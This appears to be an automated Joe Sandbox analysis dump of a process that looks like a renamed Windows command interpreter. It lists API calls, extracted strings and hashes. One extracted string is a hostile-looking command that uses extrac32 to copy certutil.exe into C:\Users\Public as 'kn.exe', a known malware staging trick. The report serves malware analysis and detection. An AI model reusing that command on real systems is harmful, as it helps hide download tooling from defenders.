                                        • Opcode ID: 64565f03666b4bb772596797247e6bb6fdde89d50adaa5f7e3853eb5f84ddd48
                                        • Instruction ID: decc04c4d01f198012f99e1d8eb5b41492c030187bd622946785b75ccbd2c4f3
                                        • Opcode Fuzzy Hash: 64565f03666b4bb772596797247e6bb6fdde89d50adaa5f7e3853eb5f84ddd48
                                        • Instruction Fuzzy Hash: 0F027122B0EB8186EA24AF15E844279F6A5FB85BE4F944131DFAD43794EF3CE641C710
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1234637232.00007FF7CD481000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7CD480000, based on PE: true
                                        • Associated: 00000004.00000002.1234620873.00007FF7CD480000.00000002.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234665370.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4BD000.00000004.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C1000.00000004.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C5000.00000004.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4CF000.00000004.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234772291.00007FF7CD4D9000.00000002.00000001.01000000.00000004.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_7ff7cd480000_alpha.jbxd
                                        Similarity
                                        • API ID: Heap$_wcsicmp$AllocProcess
                                        • String ID: DISABLEDELAYEDEXPANSION$DISABLEEXTENSIONS$ENABLEDELAYEDEXPANSION$ENABLEEXTENSIONS
                                        • API String ID: 3223794493-3086019870
                                        • Opcode ID: d222a0f06bbbc582554831b5995f9d518337be47592992ae4180831db5f06540
                                        • Instruction ID: 0ffe4b1291e5888e2e7688b67602be77c25072ee032d1fb69f647d5d7abe934a
                                        • Opcode Fuzzy Hash: d222a0f06bbbc582554831b5995f9d518337be47592992ae4180831db5f06540
                                        • Instruction Fuzzy Hash: AD517125B0CA4285EA54AF16A814179FBA1FB59BA0F945135CF7E433A1FF3CE241C720
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1234637232.00007FF7CD481000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7CD480000, based on PE: true
                                        • Associated: 00000004.00000002.1234620873.00007FF7CD480000.00000002.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234665370.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4BD000.00000004.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C1000.00000004.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C5000.00000004.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4CF000.00000004.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234772291.00007FF7CD4D9000.00000002.00000001.01000000.00000004.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_7ff7cd480000_alpha.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: EQU$GEQ$GTR$LEQ$LSS$NEQ
                                        • API String ID: 0-3124875276
                                        • Opcode ID: 27546f26981fd3a6242742626cf9575fc19742bdde1af1eb23768a0abe577f48
                                        • Instruction ID: 86ada32b701a3edca5bb7f70183c4b47970475f55b8d9ab07f8d376b454ca28d
                                        • Opcode Fuzzy Hash: 27546f26981fd3a6242742626cf9575fc19742bdde1af1eb23768a0abe577f48
                                        • Instruction Fuzzy Hash: 27519120B0D94396FB147F22A444679B69AAF55774FC04135DF2E462A5FF3CA2058760
                                        APIs
                                          • Part of subcall function 00007FF7CD4958E4: EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,00007FF7CD4AC6DB), ref: 00007FF7CD4958EF
                                          • Part of subcall function 00007FF7CD49081C: GetEnvironmentVariableW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0 ref: 00007FF7CD49084E
                                        • towupper.MSVCRT ref: 00007FF7CD4AC1C9
                                        • GetDriveTypeW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF7CD4AC31C
                                        • LocalFree.API-MS-WIN-CORE-HEAP-L2-1-0 ref: 00007FF7CD4AC5CB
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1234637232.00007FF7CD481000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7CD480000, based on PE: true
                                        • Associated: 00000004.00000002.1234620873.00007FF7CD480000.00000002.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234665370.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4BD000.00000004.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C1000.00000004.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C5000.00000004.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4CF000.00000004.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234772291.00007FF7CD4D9000.00000002.00000001.01000000.00000004.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_7ff7cd480000_alpha.jbxd
                                        Similarity
                                        • API ID: CriticalDriveEnterEnvironmentFreeLocalSectionTypeVariabletowupper
                                        • String ID: %s $%s>$PROMPT$Unknown$\$extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe $x
                                        • API String ID: 2242554020-619615743
                                        • Opcode ID: 4a922d4c85f00677817b5c761d16b1de45b4041caf2284929607811bb1d70d1e
                                        • Instruction ID: 95190af248963e60d002f8bbf3379f3ae96c09707d2fea4c74a5c42bba80982b
                                        • Opcode Fuzzy Hash: 4a922d4c85f00677817b5c761d16b1de45b4041caf2284929607811bb1d70d1e
                                        • Instruction Fuzzy Hash: B6125F25B0C65281EAA4AF15A45417AE6A1EF44BB0FD44235EFBE027E4EE3CE641C724
                                        APIs
                                        • memset.MSVCRT ref: 00007FF7CD497013
                                        • ??_V@YAXPEAX@Z.MSVCRT ref: 00007FF7CD497123
                                          • Part of subcall function 00007FF7CD491EA0: wcschr.MSVCRT(?,?,?,00007FF7CD48286E,00000000,00000000,00000000,00000000,00000000,0000000A,?,00007FF7CD4B0D54), ref: 00007FF7CD491EB3
                                        • GetFullPathNameW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF7CD49706E
                                        • wcsncmp.MSVCRT ref: 00007FF7CD4970A5
                                        • wcsstr.MSVCRT ref: 00007FF7CD49F9DB
                                        • GetFileAttributesW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF7CD49FA00
                                        • GetFileAttributesW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF7CD49FA5F
                                          • Part of subcall function 00007FF7CD49823C: FindFirstFileExW.KERNELBASE ref: 00007FF7CD498280
                                          • Part of subcall function 00007FF7CD49823C: GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF7CD49829D
                                          • Part of subcall function 00007FF7CD493A0C: FindClose.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,00007FF7CD4AEAC5,?,?,?,00007FF7CD4AE925,?,?,?,?,00007FF7CD48B9B1), ref: 00007FF7CD493A56
                                        • GetDriveTypeW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF7CD49FA3D
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1234637232.00007FF7CD481000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7CD480000, based on PE: true
                                        • Associated: 00000004.00000002.1234620873.00007FF7CD480000.00000002.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234665370.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4BD000.00000004.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C1000.00000004.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C5000.00000004.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4CF000.00000004.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234772291.00007FF7CD4D9000.00000002.00000001.01000000.00000004.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_7ff7cd480000_alpha.jbxd
                                        Similarity
                                        • API ID: File$AttributesFindmemset$CloseDriveErrorFirstFullLastNamePathTypewcschrwcsncmpwcsstr
                                        • String ID: \\.\
                                        • API String ID: 799470305-2900601889
                                        • Opcode ID: 7ea5b237473074eb8a3c93ab886d3958f76363502f2a90bc42476f967ba8e34b
                                        • Instruction ID: 1e7cc45096b769b126ce6e8c30eb3e08a669c48094220a8cbe5c124f3c990e04
                                        • Opcode Fuzzy Hash: 7ea5b237473074eb8a3c93ab886d3958f76363502f2a90bc42476f967ba8e34b
                                        • Instruction Fuzzy Hash: CA51DB31B0CA8286EB60AF12E401ABDB7A6FB85BA4F854135DF5D07794EF3CD6458310
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1234637232.00007FF7CD481000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7CD480000, based on PE: true
                                        • Associated: 00000004.00000002.1234620873.00007FF7CD480000.00000002.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234665370.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4BD000.00000004.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C1000.00000004.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C5000.00000004.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4CF000.00000004.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234772291.00007FF7CD4D9000.00000002.00000001.01000000.00000004.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_7ff7cd480000_alpha.jbxd
                                        Similarity
                                        • API ID: _wcsicmpwcschr$AttributesErrorFileLastwcsrchr
                                        • String ID:
                                        • API String ID: 1944892715-0
                                        • Opcode ID: b04fd89d1b32d74b41568e07ffd85bc9ccdf1354646f06c8d836b15a263e4c9a
                                        • Instruction ID: 6e41c1d011781c49192646e35267747026cd4141f1cee06d5ab4b23a27a50418
                                        • Opcode Fuzzy Hash: b04fd89d1b32d74b41568e07ffd85bc9ccdf1354646f06c8d836b15a263e4c9a
                                        • Instruction Fuzzy Hash: 33B18D21B0DA4286EA60BF52A854179F6A5FF55BA0FC48135CF6E87395FF3CE6408720
                                        APIs
                                          • Part of subcall function 00007FF7CD493578: _get_osfhandle.MSVCRT ref: 00007FF7CD493584
                                          • Part of subcall function 00007FF7CD493578: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(?,?,00000014,00007FF7CD4832E8,?,?,?,?,?,?,?,?,0000000A,?,00000000,00000014), ref: 00007FF7CD49359C
                                          • Part of subcall function 00007FF7CD493578: GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,00000014,00007FF7CD4832E8,?,?,?,?,?,?,?,?,0000000A,?,00000000,00000014), ref: 00007FF7CD4935C3
                                          • Part of subcall function 00007FF7CD493578: AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000014,00007FF7CD4832E8,?,?,?,?,?,?,?,?,0000000A,?,00000000,00000014), ref: 00007FF7CD4935D9
                                          • Part of subcall function 00007FF7CD493578: GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,00000014,00007FF7CD4832E8,?,?,?,?,?,?,?,?,0000000A,?,00000000,00000014), ref: 00007FF7CD4935ED
                                          • Part of subcall function 00007FF7CD493578: ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000014,00007FF7CD4832E8,?,?,?,?,?,?,?,?,0000000A,?,00000000,00000014), ref: 00007FF7CD493602
                                        • _get_osfhandle.MSVCRT ref: 00007FF7CD4854DE
                                        • WideCharToMultiByte.API-MS-WIN-CORE-STRING-L1-1-0(?,?,00007FF7CD481F7D), ref: 00007FF7CD48552B
                                        • WriteFile.API-MS-WIN-CORE-FILE-L1-1-0(?,?,00007FF7CD481F7D), ref: 00007FF7CD48554F
                                        • _get_osfhandle.MSVCRT ref: 00007FF7CD4A345F
                                        • WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,00007FF7CD481F7D), ref: 00007FF7CD4A347E
                                        • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,00007FF7CD481F7D), ref: 00007FF7CD4A34C3
                                        • _get_osfhandle.MSVCRT ref: 00007FF7CD4A34DB
                                        • WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,00007FF7CD481F7D), ref: 00007FF7CD4A34FA
                                          • Part of subcall function 00007FF7CD4936EC: _get_osfhandle.MSVCRT ref: 00007FF7CD493715
                                          • Part of subcall function 00007FF7CD4936EC: WideCharToMultiByte.API-MS-WIN-CORE-STRING-L1-1-0 ref: 00007FF7CD493770
                                          • Part of subcall function 00007FF7CD4936EC: WriteFile.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF7CD493791
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1234637232.00007FF7CD481000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7CD480000, based on PE: true
                                        • Associated: 00000004.00000002.1234620873.00007FF7CD480000.00000002.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234665370.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4BD000.00000004.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C1000.00000004.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C5000.00000004.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4CF000.00000004.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234772291.00007FF7CD4D9000.00000002.00000001.01000000.00000004.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_7ff7cd480000_alpha.jbxd
                                        Similarity
                                        • API ID: _get_osfhandle$ConsoleWrite$File$ByteCharLockModeMultiSharedWide$AcquireHandleReleaseTypewcschr
                                        • String ID:
                                        • API String ID: 1356649289-0
                                        • Opcode ID: 0c4a37dfe8b9f6674b9d741f685a90a2de3626c6216cde8b4183c3294efd6170
                                        • Instruction ID: c1e70caea03f0fecf0d5986efe186078b614a0d23a9d4a0b5a4a57d37c6f20de
                                        • Opcode Fuzzy Hash: 0c4a37dfe8b9f6674b9d741f685a90a2de3626c6216cde8b4183c3294efd6170
                                        • Instruction Fuzzy Hash: 64916F32B0CA4297E724AF55A404579F6E6FB88BA4F884135DF6E43754EF3CE6448B20
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1234637232.00007FF7CD481000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7CD480000, based on PE: true
                                        • Associated: 00000004.00000002.1234620873.00007FF7CD480000.00000002.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234665370.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4BD000.00000004.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C1000.00000004.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C5000.00000004.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4CF000.00000004.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234772291.00007FF7CD4D9000.00000002.00000001.01000000.00000004.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_7ff7cd480000_alpha.jbxd
                                        Similarity
                                        • API ID: LocalTime$ErrorLast_get_osfhandle
                                        • String ID: %s$/-.$:
                                        • API String ID: 1644023181-879152773
                                        • Opcode ID: 52adc4b69c0d6b0cc37f226843e3bc06c06473f0745bac629c27b33a4c267472
                                        • Instruction ID: e3d4d9ca030e3dd7ab4349f6768e18e0359e114650b94093bab6ea9c4c24d5be
                                        • Opcode Fuzzy Hash: 52adc4b69c0d6b0cc37f226843e3bc06c06473f0745bac629c27b33a4c267472
                                        • Instruction Fuzzy Hash: 26917062B0C64296EF14AF65D4402B9E6A1FF84BA4FC44036DF6E46694FE3CE746C720
                                        APIs
                                        • WaitForSingleObject.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000000,00007FF7CD4A7251), ref: 00007FF7CD4A628E
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1234637232.00007FF7CD481000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7CD480000, based on PE: true
                                        • Associated: 00000004.00000002.1234620873.00007FF7CD480000.00000002.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234665370.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4BD000.00000004.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C1000.00000004.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C5000.00000004.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4CF000.00000004.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234772291.00007FF7CD4D9000.00000002.00000001.01000000.00000004.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_7ff7cd480000_alpha.jbxd
                                        Similarity
                                        • API ID: ObjectSingleWait
                                        • String ID: wil
                                        • API String ID: 24740636-1589926490
                                        • Opcode ID: ea3b1f99615cb6da41309659edc9fe07f1318ac417b21432a0effa90e1671882
                                        • Instruction ID: c1a5643916b3f65453a3fb75d115c81a5fee84c2f47e3e39f8e025539825f153
                                        • Opcode Fuzzy Hash: ea3b1f99615cb6da41309659edc9fe07f1318ac417b21432a0effa90e1671882
                                        • Instruction Fuzzy Hash: A6415021B0CD4283F3606F55E40427AB6A2EF957A0FE08131DF2E466D4EF3DEA498721
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1234637232.00007FF7CD481000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7CD480000, based on PE: true
                                        • Associated: 00000004.00000002.1234620873.00007FF7CD480000.00000002.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234665370.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4BD000.00000004.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C1000.00000004.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C5000.00000004.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4CF000.00000004.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234772291.00007FF7CD4D9000.00000002.00000001.01000000.00000004.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_7ff7cd480000_alpha.jbxd
                                        Similarity
                                        • API ID: FormatMessage$ByteCharFreeLocalMultiWide_ultoa
                                        • String ID: $Application$System
                                        • API String ID: 3377411628-1881496484
                                        • Opcode ID: 80d38d575318b3867918aa38a6e3db8ef172391286b4c5249a392e05da5dfb20
                                        • Instruction ID: 36c887a77c0770c4085969aa83eb26ec81e5fa7a27cd020fdd10891fa7c270e8
                                        • Opcode Fuzzy Hash: 80d38d575318b3867918aa38a6e3db8ef172391286b4c5249a392e05da5dfb20
                                        • Instruction Fuzzy Hash: 9F417B32B08F429AE710AFA1E8403EDB7A5FB89758F845135DE5E42B98EF38D245C750
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1234637232.00007FF7CD481000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7CD480000, based on PE: true
                                        • Associated: 00000004.00000002.1234620873.00007FF7CD480000.00000002.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234665370.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4BD000.00000004.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C1000.00000004.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C5000.00000004.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4CF000.00000004.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234772291.00007FF7CD4D9000.00000002.00000001.01000000.00000004.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_7ff7cd480000_alpha.jbxd
                                        Similarity
                                        • API ID: AttributesDirectoryFileRemove$ErrorFullLastNamePath
                                        • String ID: :$\
                                        • API String ID: 3961617410-1166558509
                                        • Opcode ID: 7382dc9ba5dd15d1d826e80cca2a433ebb6210e0cfd6d3e104106e7a41e883e1
                                        • Instruction ID: 211f8755724541149b3e9a2fed10ca77a2337e470fd7c5bba59b3b256f3baa1a
                                        • Opcode Fuzzy Hash: 7382dc9ba5dd15d1d826e80cca2a433ebb6210e0cfd6d3e104106e7a41e883e1
                                        • Instruction Fuzzy Hash: 1C216521B0CA42D6E7506F65A844079F692EB5A7A4BC44132DF2F82794EF3CE6458720
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1234637232.00007FF7CD481000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7CD480000, based on PE: true
                                        • Associated: 00000004.00000002.1234620873.00007FF7CD480000.00000002.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234665370.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4BD000.00000004.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C1000.00000004.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C5000.00000004.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4CF000.00000004.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234772291.00007FF7CD4D9000.00000002.00000001.01000000.00000004.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_7ff7cd480000_alpha.jbxd
                                        Similarity
                                        • API ID: CreateDirectoryDriveFullNamePathTypememset
                                        • String ID:
                                        • API String ID: 1397130798-0
                                        • Opcode ID: 53223a99652f8e81a4eeb04428d23ca491e991d1bc8129b69f2a7ec7696704bc
                                        • Instruction ID: 3ed01021f312f1b4842f9bc815fe1aab97610ed01205ce321e8b16a9192a42ef
                                        • Opcode Fuzzy Hash: 53223a99652f8e81a4eeb04428d23ca491e991d1bc8129b69f2a7ec7696704bc
                                        • Instruction Fuzzy Hash: 5091A322B0CB8196EA65BF1198516B9F3A6FB44BA4F848035DF5E43794FF3CE6408720
                                        APIs
                                          • Part of subcall function 00007FF7CD4906C0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF7CD48B4DB), ref: 00007FF7CD4906D6
                                          • Part of subcall function 00007FF7CD4906C0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF7CD48B4DB), ref: 00007FF7CD4906F0
                                          • Part of subcall function 00007FF7CD4906C0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF7CD48B4DB), ref: 00007FF7CD49074D
                                          • Part of subcall function 00007FF7CD4906C0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF7CD48B4DB), ref: 00007FF7CD490762
                                        • _wcsicmp.MSVCRT ref: 00007FF7CD4925CA
                                        • _wcsicmp.MSVCRT ref: 00007FF7CD4925E8
                                        • _wcsicmp.MSVCRT ref: 00007FF7CD49260F
                                        • _wcsicmp.MSVCRT ref: 00007FF7CD492636
                                        • _wcsicmp.MSVCRT ref: 00007FF7CD492650
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1234637232.00007FF7CD481000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7CD480000, based on PE: true
                                        • Associated: 00000004.00000002.1234620873.00007FF7CD480000.00000002.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234665370.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4BD000.00000004.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C1000.00000004.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C5000.00000004.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4CF000.00000004.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234772291.00007FF7CD4D9000.00000002.00000001.01000000.00000004.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_7ff7cd480000_alpha.jbxd
                                        Similarity
                                        • API ID: _wcsicmp$Heap$AllocProcess
                                        • String ID: CMDEXTVERSION$DEFINED$ERRORLEVEL$EXIST$NOT
                                        • API String ID: 3407644289-1668778490
                                        • Opcode ID: 73bc52d87adb43f98016766748090f79ae3978062519f174c0f235f90d2ce4d7
                                        • Instruction ID: 8023178bf802ae78e0c72e059524a2a329476c2d6d002f2c25ce1bb2ece559fc
                                        • Opcode Fuzzy Hash: 73bc52d87adb43f98016766748090f79ae3978062519f174c0f235f90d2ce4d7
                                        • Instruction Fuzzy Hash: F7315F21B0C50295FB107F62E85567AB69AAF94BB4FC88035DF2E46695FE3CE600C730
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1234637232.00007FF7CD481000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7CD480000, based on PE: true
                                        • Associated: 00000004.00000002.1234620873.00007FF7CD480000.00000002.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234665370.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4BD000.00000004.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C1000.00000004.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C5000.00000004.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4CF000.00000004.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234772291.00007FF7CD4D9000.00000002.00000001.01000000.00000004.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_7ff7cd480000_alpha.jbxd
                                        Similarity
                                        • API ID: memset$callocfreememmovewcschr$AttributesErrorFileLastqsorttowupperwcsrchr
                                        • String ID: &()[]{}^=;!%'+,`~
                                        • API String ID: 2516562204-381716982
                                        • Opcode ID: 46497fca5754c6479966f60d4708fe0825c75a770e24346d8a6fbe1751f9d7e4
                                        • Instruction ID: bd707b1cc7222ae83c38b5465fe82a298b9026ff0652d5c429896487e0328b72
                                        • Opcode Fuzzy Hash: 46497fca5754c6479966f60d4708fe0825c75a770e24346d8a6fbe1751f9d7e4
                                        • Instruction Fuzzy Hash: 00C1D032B08A9186E750AF65E8402BEB7A1FB54BA5F801135EF9D03B98EF3CE550C710
                                        APIs
                                          • Part of subcall function 00007FF7CD48D3F0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0 ref: 00007FF7CD48D46E
                                          • Part of subcall function 00007FF7CD48D3F0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0 ref: 00007FF7CD48D485
                                          • Part of subcall function 00007FF7CD48D3F0: wcschr.MSVCRT ref: 00007FF7CD48D4EE
                                          • Part of subcall function 00007FF7CD48D3F0: iswspace.MSVCRT ref: 00007FF7CD48D54D
                                          • Part of subcall function 00007FF7CD48D3F0: wcschr.MSVCRT ref: 00007FF7CD48D569
                                          • Part of subcall function 00007FF7CD48D3F0: wcschr.MSVCRT ref: 00007FF7CD48D58C
                                        • iswspace.MSVCRT ref: 00007FF7CD497EEE
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1234637232.00007FF7CD481000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7CD480000, based on PE: true
                                        • Associated: 00000004.00000002.1234620873.00007FF7CD480000.00000002.00000001.01000000.00000004.sdmp
